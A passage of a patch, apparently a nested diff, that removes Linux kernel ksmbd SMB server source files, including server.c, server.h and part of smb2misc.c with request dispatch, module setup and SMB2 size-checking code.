+-struct lease_ctx_info *parse_lease_state(void *open_req);
+-__u8 smb2_map_lease_to_oplock(__le32 lease_state);
+-int lease_read_to_write(struct oplock_info *opinfo);
+-
+-/* Durable related functions */
+-void create_durable_rsp_buf(char *cc);
+-void create_durable_v2_rsp_buf(char *cc, struct ksmbd_file *fp);
+-void create_mxac_rsp_buf(char *cc, int maximal_access);
+-void create_disk_id_rsp_buf(char *cc, __u64 file_id, __u64 vol_id);
+-void create_posix_rsp_buf(char *cc, struct ksmbd_file *fp);
+-struct create_context *smb2_find_context_vals(void *open_req, const char *tag, int tag_len);
+-struct oplock_info *lookup_lease_in_table(struct ksmbd_conn *conn,
+-					  char *lease_key);
+-int find_same_lease_key(struct ksmbd_session *sess, struct ksmbd_inode *ci,
+-			struct lease_ctx_info *lctx);
+-void destroy_lease_table(struct ksmbd_conn *conn);
+-#endif /* __KSMBD_OPLOCK_H */
+diff --git a/fs/ksmbd/server.c b/fs/ksmbd/server.c
+deleted file mode 100644
+index 8a0ad399f2456..0000000000000
+--- a/fs/ksmbd/server.c
++++ /dev/null
+@@ -1,639 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include "glob.h"
+-#include "oplock.h"
+-#include "misc.h"
+-#include <linux/sched/signal.h>
+-#include <linux/workqueue.h>
+-#include <linux/sysfs.h>
+-#include <linux/module.h>
+-#include <linux/moduleparam.h>
+-
+-#include "server.h"
+-#include "smb_common.h"
+-#include "smbstatus.h"
+-#include "connection.h"
+-#include "transport_ipc.h"
+-#include "mgmt/user_session.h"
+-#include "crypto_ctx.h"
+-#include "auth.h"
+-
+-int ksmbd_debug_types;
+-
+-struct ksmbd_server_config server_conf;
+-
+-enum SERVER_CTRL_TYPE {
+-	SERVER_CTRL_TYPE_INIT,
+-	SERVER_CTRL_TYPE_RESET,
+-};
+-
+-struct server_ctrl_struct {
+-	int			type;
+-	struct work_struct	ctrl_work;
+-};
+-
+-static DEFINE_MUTEX(ctrl_lock);
+-
+-static int ___server_conf_set(int idx, char *val)
+-{
+-	if (idx >= ARRAY_SIZE(server_conf.conf))
+-		return -EINVAL;
+-
+-	if (!val || val[0] == 0x00)
+-		return -EINVAL;
+-
+-	kfree(server_conf.conf[idx]);
+-	server_conf.conf[idx] = kstrdup(val, GFP_KERNEL);
+-	if (!server_conf.conf[idx])
+-		return -ENOMEM;
+-	return 0;
+-}
+-
+-int ksmbd_set_netbios_name(char *v)
+-{
+-	return ___server_conf_set(SERVER_CONF_NETBIOS_NAME, v);
+-}
+-
+-int ksmbd_set_server_string(char *v)
+-{
+-	return ___server_conf_set(SERVER_CONF_SERVER_STRING, v);
+-}
+-
+-int ksmbd_set_work_group(char *v)
+-{
+-	return ___server_conf_set(SERVER_CONF_WORK_GROUP, v);
+-}
+-
+-char *ksmbd_netbios_name(void)
+-{
+-	return server_conf.conf[SERVER_CONF_NETBIOS_NAME];
+-}
+-
+-char *ksmbd_server_string(void)
+-{
+-	return server_conf.conf[SERVER_CONF_SERVER_STRING];
+-}
+-
+-char *ksmbd_work_group(void)
+-{
+-	return server_conf.conf[SERVER_CONF_WORK_GROUP];
+-}
+-
+-/**
+- * check_conn_state() - check state of server thread connection
+- * @work:     smb work containing server thread information
+- *
+- * Return:	0 on valid connection, otherwise 1 to reconnect
+- */
+-static inline int check_conn_state(struct ksmbd_work *work)
+-{
+-	struct smb_hdr *rsp_hdr;
+-
+-	if (ksmbd_conn_exiting(work->conn) ||
+-	    ksmbd_conn_need_reconnect(work->conn)) {
+-		rsp_hdr = work->response_buf;
+-		rsp_hdr->Status.CifsError = STATUS_CONNECTION_DISCONNECTED;
+-		return 1;
+-	}
+-	return 0;
+-}
+-
+-#define SERVER_HANDLER_CONTINUE		0
+-#define SERVER_HANDLER_ABORT		1
+-
+-static int __process_request(struct ksmbd_work *work, struct ksmbd_conn *conn,
+-			     u16 *cmd)
+-{
+-	struct smb_version_cmds *cmds;
+-	u16 command;
+-	int ret;
+-
+-	if (check_conn_state(work))
+-		return SERVER_HANDLER_CONTINUE;
+-
+-	if (ksmbd_verify_smb_message(work))
+-		return SERVER_HANDLER_ABORT;
+-
+-	command = conn->ops->get_cmd_val(work);
+-	*cmd = command;
+-
+-andx_again:
+-	if (command >= conn->max_cmds) {
+-		conn->ops->set_rsp_status(work, STATUS_INVALID_PARAMETER);
+-		return SERVER_HANDLER_CONTINUE;
+-	}
+-
+-	cmds = &conn->cmds[command];
+-	if (!cmds->proc) {
+-		ksmbd_debug(SMB, "*** not implemented yet cmd = %x\n", command);
+-		conn->ops->set_rsp_status(work, STATUS_NOT_IMPLEMENTED);
+-		return SERVER_HANDLER_CONTINUE;
+-	}
+-
+-	if (work->sess && conn->ops->is_sign_req(work, command)) {
+-		ret = conn->ops->check_sign_req(work);
+-		if (!ret) {
+-			conn->ops->set_rsp_status(work, STATUS_ACCESS_DENIED);
+-			return SERVER_HANDLER_CONTINUE;
+-		}
+-	}
+-
+-	ret = cmds->proc(work);
+-
+-	if (ret < 0)
+-		ksmbd_debug(CONN, "Failed to process %u [%d]\n", command, ret);
+-	/* AndX commands - chained request can return positive values */
+-	else if (ret > 0) {
+-		command = ret;
+-		*cmd = command;
+-		goto andx_again;
+-	}
+-
+-	if (work->send_no_response)
+-		return SERVER_HANDLER_ABORT;
+-	return SERVER_HANDLER_CONTINUE;
+-}
+-
+-static void __handle_ksmbd_work(struct ksmbd_work *work,
+-				struct ksmbd_conn *conn)
+-{
+-	u16 command = 0;
+-	int rc;
+-
+-	if (conn->ops->allocate_rsp_buf(work))
+-		return;
+-
+-	if (conn->ops->is_transform_hdr &&
+-	    conn->ops->is_transform_hdr(work->request_buf)) {
+-		rc = conn->ops->decrypt_req(work);
+-		if (rc < 0) {
+-			conn->ops->set_rsp_status(work, STATUS_DATA_ERROR);
+-			goto send;
+-		}
+-
+-		work->encrypted = true;
+-	}
+-
+-	rc = conn->ops->init_rsp_hdr(work);
+-	if (rc) {
+-		/* either uid or tid is not correct */
+-		conn->ops->set_rsp_status(work, STATUS_INVALID_HANDLE);
+-		goto send;
+-	}
+-
+-	if (conn->ops->check_user_session) {
+-		rc = conn->ops->check_user_session(work);
+-		if (rc < 0) {
+-			command = conn->ops->get_cmd_val(work);
+-			conn->ops->set_rsp_status(work,
+-					STATUS_USER_SESSION_DELETED);
+-			goto send;
+-		} else if (rc > 0) {
+-			rc = conn->ops->get_ksmbd_tcon(work);
+-			if (rc < 0) {
+-				conn->ops->set_rsp_status(work,
+-					STATUS_NETWORK_NAME_DELETED);
+-				goto send;
+-			}
+-		}
+-	}
+-
+-	do {
+-		rc = __process_request(work, conn, &command);
+-		if (rc == SERVER_HANDLER_ABORT)
+-			break;
+-
+-		/*
+-		 * Call smb2_set_rsp_credits() function to set number of credits
+-		 * granted in hdr of smb2 response.
+-		 */
+-		if (conn->ops->set_rsp_credits) {
+-			spin_lock(&conn->credits_lock);
+-			rc = conn->ops->set_rsp_credits(work);
+-			spin_unlock(&conn->credits_lock);
+-			if (rc < 0) {
+-				conn->ops->set_rsp_status(work,
+-					STATUS_INVALID_PARAMETER);
+-				goto send;
+-			}
+-		}
+-
+-		if (work->sess &&
+-		    (work->sess->sign || smb3_11_final_sess_setup_resp(work) ||
+-		     conn->ops->is_sign_req(work, command)))
+-			conn->ops->set_sign_rsp(work);
+-	} while (is_chained_smb2_message(work));
+-
+-	if (work->send_no_response)
+-		return;
+-
+-send:
+-	smb3_preauth_hash_rsp(work);
+-	if (work->sess && work->sess->enc && work->encrypted &&
+-	    conn->ops->encrypt_resp) {
+-		rc = conn->ops->encrypt_resp(work);
+-		if (rc < 0)
+-			conn->ops->set_rsp_status(work, STATUS_DATA_ERROR);
+-	}
+-
+-	ksmbd_conn_write(work);
+-}
+-
+-/**
+- * handle_ksmbd_work() - process pending smb work requests
+- * @wk:	smb work containing request command buffer
+- *
+- * called by kworker threads to processing remaining smb work requests
+- */
+-static void handle_ksmbd_work(struct work_struct *wk)
+-{
+-	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
+-	struct ksmbd_conn *conn = work->conn;
+-
+-	atomic64_inc(&conn->stats.request_served);
+-
+-	__handle_ksmbd_work(work, conn);
+-
+-	ksmbd_conn_try_dequeue_request(work);
+-	ksmbd_free_work_struct(work);
+-	/*
+-	 * Checking waitqueue to dropping pending requests on
+-	 * disconnection. waitqueue_active is safe because it
+-	 * uses atomic operation for condition.
+-	 */
+-	if (!atomic_dec_return(&conn->r_count) && waitqueue_active(&conn->r_count_q))
+-		wake_up(&conn->r_count_q);
+-}
+-
+-/**
+- * queue_ksmbd_work() - queue a smb request to worker thread queue
+- *		for proccessing smb command and sending response
+- * @conn:	connection instance
+- *
+- * read remaining data from socket create and submit work.
+- */
+-static int queue_ksmbd_work(struct ksmbd_conn *conn)
+-{
+-	struct ksmbd_work *work;
+-
+-	work = ksmbd_alloc_work_struct();
+-	if (!work) {
+-		pr_err("allocation for work failed\n");
+-		return -ENOMEM;
+-	}
+-
+-	work->conn = conn;
+-	work->request_buf = conn->request_buf;
+-	conn->request_buf = NULL;
+-
+-	ksmbd_init_smb_server(work);
+-
+-	ksmbd_conn_enqueue_request(work);
+-	atomic_inc(&conn->r_count);
+-	/* update activity on connection */
+-	conn->last_active = jiffies;
+-	INIT_WORK(&work->work, handle_ksmbd_work);
+-	ksmbd_queue_work(work);
+-	return 0;
+-}
+-
+-static int ksmbd_server_process_request(struct ksmbd_conn *conn)
+-{
+-	return queue_ksmbd_work(conn);
+-}
+-
+-static int ksmbd_server_terminate_conn(struct ksmbd_conn *conn)
+-{
+-	ksmbd_sessions_deregister(conn);
+-	destroy_lease_table(conn);
+-	return 0;
+-}
+-
+-static void ksmbd_server_tcp_callbacks_init(void)
+-{
+-	struct ksmbd_conn_ops ops;
+-
+-	ops.process_fn = ksmbd_server_process_request;
+-	ops.terminate_fn = ksmbd_server_terminate_conn;
+-
+-	ksmbd_conn_init_server_callbacks(&ops);
+-}
+-
+-static void server_conf_free(void)
+-{
+-	int i;
+-
+-	for (i = 0; i < ARRAY_SIZE(server_conf.conf); i++) {
+-		kfree(server_conf.conf[i]);
+-		server_conf.conf[i] = NULL;
+-	}
+-}
+-
+-static int server_conf_init(void)
+-{
+-	WRITE_ONCE(server_conf.state, SERVER_STATE_STARTING_UP);
+-	server_conf.enforced_signing = 0;
+-	server_conf.min_protocol = ksmbd_min_protocol();
+-	server_conf.max_protocol = ksmbd_max_protocol();
+-	server_conf.auth_mechs = KSMBD_AUTH_NTLMSSP;
+-#ifdef CONFIG_SMB_SERVER_KERBEROS5
+-	server_conf.auth_mechs |= KSMBD_AUTH_KRB5 |
+-				KSMBD_AUTH_MSKRB5;
+-#endif
+-	return 0;
+-}
+-
+-static void server_ctrl_handle_init(struct server_ctrl_struct *ctrl)
+-{
+-	int ret;
+-
+-	ret = ksmbd_conn_transport_init();
+-	if (ret) {
+-		server_queue_ctrl_reset_work();
+-		return;
+-	}
+-
+-	WRITE_ONCE(server_conf.state, SERVER_STATE_RUNNING);
+-}
+-
+-static void server_ctrl_handle_reset(struct server_ctrl_struct *ctrl)
+-{
+-	ksmbd_ipc_soft_reset();
+-	ksmbd_conn_transport_destroy();
+-	server_conf_free();
+-	server_conf_init();
+-	WRITE_ONCE(server_conf.state, SERVER_STATE_STARTING_UP);
+-}
+-
+-static void server_ctrl_handle_work(struct work_struct *work)
+-{
+-	struct server_ctrl_struct *ctrl;
+-
+-	ctrl = container_of(work, struct server_ctrl_struct, ctrl_work);
+-
+-	mutex_lock(&ctrl_lock);
+-	switch (ctrl->type) {
+-	case SERVER_CTRL_TYPE_INIT:
+-		server_ctrl_handle_init(ctrl);
+-		break;
+-	case SERVER_CTRL_TYPE_RESET:
+-		server_ctrl_handle_reset(ctrl);
+-		break;
+-	default:
+-		pr_err("Unknown server work type: %d\n", ctrl->type);
+-	}
+-	mutex_unlock(&ctrl_lock);
+-	kfree(ctrl);
+-	module_put(THIS_MODULE);
+-}
+-
+-static int __queue_ctrl_work(int type)
+-{
+-	struct server_ctrl_struct *ctrl;
+-
+-	ctrl = kmalloc(sizeof(struct server_ctrl_struct), GFP_KERNEL);
+-	if (!ctrl)
+-		return -ENOMEM;
+-
+-	__module_get(THIS_MODULE);
+-	ctrl->type = type;
+-	INIT_WORK(&ctrl->ctrl_work, server_ctrl_handle_work);
+-	queue_work(system_long_wq, &ctrl->ctrl_work);
+-	return 0;
+-}
+-
+-int server_queue_ctrl_init_work(void)
+-{
+-	return __queue_ctrl_work(SERVER_CTRL_TYPE_INIT);
+-}
+-
+-int server_queue_ctrl_reset_work(void)
+-{
+-	return __queue_ctrl_work(SERVER_CTRL_TYPE_RESET);
+-}
+-
+-static ssize_t stats_show(struct class *class, struct class_attribute *attr,
+-			  char *buf)
+-{
+-	/*
+-	 * Inc this each time you change stats output format,
+-	 * so user space will know what to do.
+-	 */
+-	static int stats_version = 2;
+-	static const char * const state[] = {
+-		"startup",
+-		"running",
+-		"reset",
+-		"shutdown"
+-	};
+-
+-	ssize_t sz = scnprintf(buf, PAGE_SIZE, "%d %s %d %lu\n", stats_version,
+-			       state[server_conf.state], server_conf.tcp_port,
+-			       server_conf.ipc_last_active / HZ);
+-	return sz;
+-}
+-
+-static ssize_t kill_server_store(struct class *class,
+-				 struct class_attribute *attr, const char *buf,
+-				 size_t len)
+-{
+-	if (!sysfs_streq(buf, "hard"))
+-		return len;
+-
+-	pr_info("kill command received\n");
+-	mutex_lock(&ctrl_lock);
+-	WRITE_ONCE(server_conf.state, SERVER_STATE_RESETTING);
+-	__module_get(THIS_MODULE);
+-	server_ctrl_handle_reset(NULL);
+-	module_put(THIS_MODULE);
+-	mutex_unlock(&ctrl_lock);
+-	return len;
+-}
+-
+-static const char * const debug_type_strings[] = {"smb", "auth", "vfs",
+-						  "oplock", "ipc", "conn",
+-						  "rdma"};
+-
+-static ssize_t debug_show(struct class *class, struct class_attribute *attr,
+-			  char *buf)
+-{
+-	ssize_t sz = 0;
+-	int i, pos = 0;
+-
+-	for (i = 0; i < ARRAY_SIZE(debug_type_strings); i++) {
+-		if ((ksmbd_debug_types >> i) & 1) {
+-			pos = scnprintf(buf + sz,
+-					PAGE_SIZE - sz,
+-					"[%s] ",
+-					debug_type_strings[i]);
+-		} else {
+-			pos = scnprintf(buf + sz,
+-					PAGE_SIZE - sz,
+-					"%s ",
+-					debug_type_strings[i]);
+-		}
+-		sz += pos;
+-	}
+-	sz += scnprintf(buf + sz, PAGE_SIZE - sz, "\n");
+-	return sz;
+-}
+-
+-static ssize_t debug_store(struct class *class, struct class_attribute *attr,
+-			   const char *buf, size_t len)
+-{
+-	int i;
+-
+-	for (i = 0; i < ARRAY_SIZE(debug_type_strings); i++) {
+-		if (sysfs_streq(buf, "all")) {
+-			if (ksmbd_debug_types == KSMBD_DEBUG_ALL)
+-				ksmbd_debug_types = 0;
+-			else
+-				ksmbd_debug_types = KSMBD_DEBUG_ALL;
+-			break;
+-		}
+-
+-		if (sysfs_streq(buf, debug_type_strings[i])) {
+-			if (ksmbd_debug_types & (1 << i))
+-				ksmbd_debug_types &= ~(1 << i);
+-			else
+-				ksmbd_debug_types |= (1 << i);
+-			break;
+-		}
+-	}
+-
+-	return len;
+-}
+-
+-static CLASS_ATTR_RO(stats);
+-static CLASS_ATTR_WO(kill_server);
+-static CLASS_ATTR_RW(debug);
+-
+-static struct attribute *ksmbd_control_class_attrs[] = {
+-	&class_attr_stats.attr,
+-	&class_attr_kill_server.attr,
+-	&class_attr_debug.attr,
+-	NULL,
+-};
+-ATTRIBUTE_GROUPS(ksmbd_control_class);
+-
+-static struct class ksmbd_control_class = {
+-	.name		= "ksmbd-control",
+-	.owner		= THIS_MODULE,
+-	.class_groups	= ksmbd_control_class_groups,
+-};
+-
+-static int ksmbd_server_shutdown(void)
+-{
+-	WRITE_ONCE(server_conf.state, SERVER_STATE_SHUTTING_DOWN);
+-
+-	class_unregister(&ksmbd_control_class);
+-	ksmbd_workqueue_destroy();
+-	ksmbd_ipc_release();
+-	ksmbd_conn_transport_destroy();
+-	ksmbd_crypto_destroy();
+-	ksmbd_free_global_file_table();
+-	destroy_lease_table(NULL);
+-	ksmbd_work_pool_destroy();
+-	ksmbd_exit_file_cache();
+-	server_conf_free();
+-	return 0;
+-}
+-
+-static int __init ksmbd_server_init(void)
+-{
+-	int ret;
+-
+-	ret = class_register(&ksmbd_control_class);
+-	if (ret) {
+-		pr_err("Unable to register ksmbd-control class\n");
+-		return ret;
+-	}
+-
+-	ksmbd_server_tcp_callbacks_init();
+-
+-	ret = server_conf_init();
+-	if (ret)
+-		goto err_unregister;
+-
+-	ret = ksmbd_work_pool_init();
+-	if (ret)
+-		goto err_unregister;
+-
+-	ret = ksmbd_init_file_cache();
+-	if (ret)
+-		goto err_destroy_work_pools;
+-
+-	ret = ksmbd_ipc_init();
+-	if (ret)
+-		goto err_exit_file_cache;
+-
+-	ret = ksmbd_init_global_file_table();
+-	if (ret)
+-		goto err_ipc_release;
+-
+-	ret = ksmbd_inode_hash_init();
+-	if (ret)
+-		goto err_destroy_file_table;
+-
+-	ret = ksmbd_crypto_create();
+-	if (ret)
+-		goto err_release_inode_hash;
+-
+-	ret = ksmbd_workqueue_init();
+-	if (ret)
+-		goto err_crypto_destroy;
+-
+-	pr_warn_once("The ksmbd server is experimental\n");
+-
+-	return 0;
+-
+-err_crypto_destroy:
+-	ksmbd_crypto_destroy();
+-err_release_inode_hash:
+-	ksmbd_release_inode_hash();
+-err_destroy_file_table:
+-	ksmbd_free_global_file_table();
+-err_ipc_release:
+-	ksmbd_ipc_release();
+-err_exit_file_cache:
+-	ksmbd_exit_file_cache();
+-err_destroy_work_pools:
+-	ksmbd_work_pool_destroy();
+-err_unregister:
+-	class_unregister(&ksmbd_control_class);
+-
+-	return ret;
+-}
+-
+-/**
+- * ksmbd_server_exit() - shutdown forker thread and free memory at module exit
+- */
+-static void __exit ksmbd_server_exit(void)
+-{
+-	ksmbd_server_shutdown();
+-	rcu_barrier();
+-	ksmbd_release_inode_hash();
+-}
+-
+-MODULE_AUTHOR("Namjae Jeon <linkinjeon@kernel.org>");
+-MODULE_VERSION(KSMBD_VERSION);
+-MODULE_DESCRIPTION("Linux kernel CIFS/SMB SERVER");
+-MODULE_LICENSE("GPL");
+-MODULE_SOFTDEP("pre: ecb");
+-MODULE_SOFTDEP("pre: hmac");
+-MODULE_SOFTDEP("pre: md5");
+-MODULE_SOFTDEP("pre: nls");
+-MODULE_SOFTDEP("pre: aes");
+-MODULE_SOFTDEP("pre: cmac");
+-MODULE_SOFTDEP("pre: sha256");
+-MODULE_SOFTDEP("pre: sha512");
+-MODULE_SOFTDEP("pre: aead2");
+-MODULE_SOFTDEP("pre: ccm");
+-MODULE_SOFTDEP("pre: gcm");
+-MODULE_SOFTDEP("pre: crc32");
+-module_init(ksmbd_server_init)
+-module_exit(ksmbd_server_exit)
+diff --git a/fs/ksmbd/server.h b/fs/ksmbd/server.h
+deleted file mode 100644
+index db72781817603..0000000000000
+--- a/fs/ksmbd/server.h
++++ /dev/null
+@@ -1,71 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __SERVER_H__
+-#define __SERVER_H__
+-
+-#include "smbacl.h"
+-
+-/*
+- * Server state type
+- */
+-enum {
+-	SERVER_STATE_STARTING_UP,
+-	SERVER_STATE_RUNNING,
+-	SERVER_STATE_RESETTING,
+-	SERVER_STATE_SHUTTING_DOWN,
+-};
+-
+-/*
+- * Server global config string index
+- */
+-enum {
+-	SERVER_CONF_NETBIOS_NAME,
+-	SERVER_CONF_SERVER_STRING,
+-	SERVER_CONF_WORK_GROUP,
+-};
+-
+-struct ksmbd_server_config {
+-	unsigned int		flags;
+-	unsigned int		state;
+-	short			signing;
+-	short			enforced_signing;
+-	short			min_protocol;
+-	short			max_protocol;
+-	unsigned short		tcp_port;
+-	unsigned short		ipc_timeout;
+-	unsigned long		ipc_last_active;
+-	unsigned long		deadtime;
+-	unsigned int		share_fake_fscaps;
+-	struct smb_sid		domain_sid;
+-	unsigned int		auth_mechs;
+-	unsigned int		max_connections;
+-
+-	char			*conf[SERVER_CONF_WORK_GROUP + 1];
+-};
+-
+-extern struct ksmbd_server_config server_conf;
+-
+-int ksmbd_set_netbios_name(char *v);
+-int ksmbd_set_server_string(char *v);
+-int ksmbd_set_work_group(char *v);
+-
+-char *ksmbd_netbios_name(void);
+-char *ksmbd_server_string(void);
+-char *ksmbd_work_group(void);
+-
+-static inline int ksmbd_server_running(void)
+-{
+-	return READ_ONCE(server_conf.state) == SERVER_STATE_RUNNING;
+-}
+-
+-static inline int ksmbd_server_configurable(void)
+-{
+-	return READ_ONCE(server_conf.state) < SERVER_STATE_RESETTING;
+-}
+-
+-int server_queue_ctrl_init_work(void);
+-int server_queue_ctrl_reset_work(void);
+-#endif /* __SERVER_H__ */
+diff --git a/fs/ksmbd/smb2misc.c b/fs/ksmbd/smb2misc.c
+deleted file mode 100644
+index 0ffe663b75906..0000000000000
+--- a/fs/ksmbd/smb2misc.c
++++ /dev/null
+@@ -1,447 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include "glob.h"
+-#include "nterr.h"
+-#include "smb_common.h"
+-#include "smbstatus.h"
+-#include "mgmt/user_session.h"
+-#include "connection.h"
+-
+-static int check_smb2_hdr(struct smb2_hdr *hdr)
+-{
+-	/*
+-	 * Make sure that this really is an SMB, that it is a response.
+-	 */
+-	if (hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR)
+-		return 1;
+-	return 0;
+-}
+-
+-/*
+- *  The following table defines the expected "StructureSize" of SMB2 requests
+- *  in order by SMB2 command.  This is similar to "wct" in SMB/CIFS requests.
+- *
+- *  Note that commands are defined in smb2pdu.h in le16 but the array below is
+- *  indexed by command in host byte order
+- */
+-static const __le16 smb2_req_struct_sizes[NUMBER_OF_SMB2_COMMANDS] = {
+-	/* SMB2_NEGOTIATE */ cpu_to_le16(36),
+-	/* SMB2_SESSION_SETUP */ cpu_to_le16(25),
+-	/* SMB2_LOGOFF */ cpu_to_le16(4),
+-	/* SMB2_TREE_CONNECT */ cpu_to_le16(9),
+-	/* SMB2_TREE_DISCONNECT */ cpu_to_le16(4),
+-	/* SMB2_CREATE */ cpu_to_le16(57),
+-	/* SMB2_CLOSE */ cpu_to_le16(24),
+-	/* SMB2_FLUSH */ cpu_to_le16(24),
+-	/* SMB2_READ */ cpu_to_le16(49),
+-	/* SMB2_WRITE */ cpu_to_le16(49),
+-	/* SMB2_LOCK */ cpu_to_le16(48),
+-	/* SMB2_IOCTL */ cpu_to_le16(57),
+-	/* SMB2_CANCEL */ cpu_to_le16(4),
+-	/* SMB2_ECHO */ cpu_to_le16(4),
+-	/* SMB2_QUERY_DIRECTORY */ cpu_to_le16(33),
+-	/* SMB2_CHANGE_NOTIFY */ cpu_to_le16(32),
+-	/* SMB2_QUERY_INFO */ cpu_to_le16(41),
+-	/* SMB2_SET_INFO */ cpu_to_le16(33),
+-	/* use 44 for lease break */
+-	/* SMB2_OPLOCK_BREAK */ cpu_to_le16(36)
+-};
+-
+-/*
+- * The size of the variable area depends on the offset and length fields
+- * located in different fields for various SMB2 requests. SMB2 requests
+- * with no variable length info, show an offset of zero for the offset field.
+- */
+-static const bool has_smb2_data_area[NUMBER_OF_SMB2_COMMANDS] = {
+-	/* SMB2_NEGOTIATE */ true,
+-	/* SMB2_SESSION_SETUP */ true,
+-	/* SMB2_LOGOFF */ false,
+-	/* SMB2_TREE_CONNECT */	true,
+-	/* SMB2_TREE_DISCONNECT */ false,
+-	/* SMB2_CREATE */ true,
+-	/* SMB2_CLOSE */ false,
+-	/* SMB2_FLUSH */ false,
+-	/* SMB2_READ */	true,
+-	/* SMB2_WRITE */ true,
+-	/* SMB2_LOCK */	true,
+-	/* SMB2_IOCTL */ true,
+-	/* SMB2_CANCEL */ false, /* BB CHECK this not listed in documentation */
+-	/* SMB2_ECHO */ false,
+-	/* SMB2_QUERY_DIRECTORY */ true,
+-	/* SMB2_CHANGE_NOTIFY */ false,
+-	/* SMB2_QUERY_INFO */ true,
+-	/* SMB2_SET_INFO */ true,
+-	/* SMB2_OPLOCK_BREAK */ false
+-};
+-
+-/*
+- * Set length of the data area and the offset to arguments.
+- * if they are invalid, return error.
+- */
+-static int smb2_get_data_area_len(unsigned int *off, unsigned int *len,
+-				  struct smb2_hdr *hdr)
+-{
+-	int ret = 0;
+-
+-	*off = 0;
+-	*len = 0;
+-
+-	/*
+-	 * Following commands have data areas so we have to get the location
+-	 * of the data buffer offset and data buffer length for the particular
+-	 * command.
+-	 */
+-	switch (hdr->Command) {
+-	case SMB2_SESSION_SETUP:
+-		*off = le16_to_cpu(((struct smb2_sess_setup_req *)hdr)->SecurityBufferOffset);
+-		*len = le16_to_cpu(((struct smb2_sess_setup_req *)hdr)->SecurityBufferLength);
+-		break;
+-	case SMB2_TREE_CONNECT:
+-		*off = le16_to_cpu(((struct smb2_tree_connect_req *)hdr)->PathOffset);
+-		*len = le16_to_cpu(((struct smb2_tree_connect_req *)hdr)->PathLength);
+-		break;
+-	case SMB2_CREATE:
+-	{
+-		if (((struct smb2_create_req *)hdr)->CreateContextsLength) {
+-			*off = le32_to_cpu(((struct smb2_create_req *)
+-				hdr)->CreateContextsOffset);
+-			*len = le32_to_cpu(((struct smb2_create_req *)
+-				hdr)->CreateContextsLength);
+-			break;
+-		}
+-
+-		*off = le16_to_cpu(((struct smb2_create_req *)hdr)->NameOffset);
+-		*len = le16_to_cpu(((struct smb2_create_req *)hdr)->NameLength);
+-		break;
+-	}
+-	case SMB2_QUERY_INFO:
+-		*off = le16_to_cpu(((struct smb2_query_info_req *)hdr)->InputBufferOffset);
+-		*len = le32_to_cpu(((struct smb2_query_info_req *)hdr)->InputBufferLength);
+-		break;
+-	case SMB2_SET_INFO:
+-		*off = le16_to_cpu(((struct smb2_set_info_req *)hdr)->BufferOffset);
+-		*len = le32_to_cpu(((struct smb2_set_info_req *)hdr)->BufferLength);
+-		break;
+-	case SMB2_READ:
+-		*off = le16_to_cpu(((struct smb2_read_req *)hdr)->ReadChannelInfoOffset);
+-		*len = le16_to_cpu(((struct smb2_read_req *)hdr)->ReadChannelInfoLength);
+-		break;
+-	case SMB2_WRITE:
+-		if (((struct smb2_write_req *)hdr)->DataOffset ||
+-		    ((struct smb2_write_req *)hdr)->Length) {
+-			*off = max_t(unsigned int,
+-				     le16_to_cpu(((struct smb2_write_req *)hdr)->DataOffset),
+-				     offsetof(struct smb2_write_req, Buffer));
+-			*len = le32_to_cpu(((struct smb2_write_req *)hdr)->Length);
+-			break;
+-		}
+-
+-		*off = le16_to_cpu(((struct smb2_write_req *)hdr)->WriteChannelInfoOffset);
+-		*len = le16_to_cpu(((struct smb2_write_req *)hdr)->WriteChannelInfoLength);
+-		break;
+-	case SMB2_QUERY_DIRECTORY:
+-		*off = le16_to_cpu(((struct smb2_query_directory_req *)hdr)->FileNameOffset);
+-		*len = le16_to_cpu(((struct smb2_query_directory_req *)hdr)->FileNameLength);
+-		break;
+-	case SMB2_LOCK:
+-	{
+-		unsigned short lock_count;
+-
+-		lock_count = le16_to_cpu(((struct smb2_lock_req *)hdr)->LockCount);
+-		if (lock_count > 0) {
+-			*off = offsetof(struct smb2_lock_req, locks);
+-			*len = sizeof(struct smb2_lock_element) * lock_count;
+-		}
+-		break;
+-	}
+-	case SMB2_IOCTL:
+-		*off = le32_to_cpu(((struct smb2_ioctl_req *)hdr)->InputOffset);
+-		*len = le32_to_cpu(((struct smb2_ioctl_req *)hdr)->InputCount);
+-		break;
+-	default:
+-		ksmbd_debug(SMB, "no length check for command\n");
+-		break;
+-	}
+-
+-	if (*off > 4096) {
+-		ksmbd_debug(SMB, "offset %d too large\n", *off);
+-		ret = -EINVAL;
+-	} else if ((u64)*off + *len > MAX_STREAM_PROT_LEN) {
+-		ksmbd_debug(SMB, "Request is larger than maximum stream protocol length(%u): %llu\n",
+-			    MAX_STREAM_PROT_LEN, (u64)*off + *len);
+-		ret = -EINVAL;
+-	}
+-
+-	return ret;
+-}
+-
+-/*
+- * Calculate the size of the SMB message based on the fixed header
+- * portion, the number of word parameters and the data portion of the message.
+- */
+-static int smb2_calc_size(void *buf, unsigned int *len)
+-{
+-	struct smb2_pdu *pdu = (struct smb2_pdu *)buf;
+-	struct smb2_hdr *hdr = &pdu->hdr;
+-	unsigned int offset; /* the offset from the beginning of SMB to data area */
+-	unsigned int data_length; /* the length of the variable length data area */
+-	int ret;
+-
+-	/* Structure Size has already been checked to make sure it is 64 */
+-	*len = le16_to_cpu(hdr->StructureSize);
+-
+-	/*
+-	 * StructureSize2, ie length of fixed parameter area has already
+-	 * been checked to make sure it is the correct length.
+-	 */
+-	*len += le16_to_cpu(pdu->StructureSize2);
+-	/*
+-	 * StructureSize2 of smb2_lock pdu is set to 48, indicating
+-	 * the size of smb2 lock request with single smb2_lock_element
+-	 * regardless of number of locks. Subtract single
+-	 * smb2_lock_element for correct buffer size check.
+-	 */
+-	if (hdr->Command == SMB2_LOCK)
+-		*len -= sizeof(struct smb2_lock_element);
+-
+-	if (has_smb2_data_area[le16_to_cpu(hdr->Command)] == false)
+-		goto calc_size_exit;
+-
+-	ret = smb2_get_data_area_len(&offset, &data_length, hdr);
